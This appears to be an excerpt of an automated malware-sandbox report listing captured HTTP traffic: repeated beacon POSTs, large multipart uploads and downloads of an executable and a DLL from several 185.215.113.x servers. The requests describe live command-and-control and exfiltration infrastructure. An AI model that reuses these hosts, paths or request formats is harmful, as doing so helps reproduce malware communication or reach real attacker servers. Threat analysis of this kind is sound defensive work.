Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 32 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 42 35 45 33 32 46 37 45 34 34 31 32 41 37 34 36 35 41 38 45 36 34 44 30 41 41 45 44 39 46 33 43 30 41 30 41 41 39 42 43 32 32 44 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278529C05BEA3669A52777FA6135B5E32F7E4412A7465A8E64D0AAED9F3C0A0AA9BC22DD20FDE4F01730503
Source: global traffic	HTTP traffic detected: GET /Files/channel3.exe HTTP/1.1Host: 103.130.147.211
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTI4MzQ4Host: 185.215.113.19Content-Length: 128500Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTA4MTA=Host: 185.215.113.19Content-Length: 90962Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTE2Mzg=Host: 185.215.113.19Content-Length: 91790Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 32 38 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000283001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /ProlongedPortable.dll HTTP/1.1Host: 185.215.113.19Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTE2Mzg=Host: 185.215.113.19Content-Length: 91790Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTY3MTQ=Host: 185.215.113.19Content-Length: 96866Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 32 38 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000284001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 32 34 30 43 44 46 39 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A240CDF9FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTE1ODI=Host: 185.215.113.19Content-Length: 91734Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
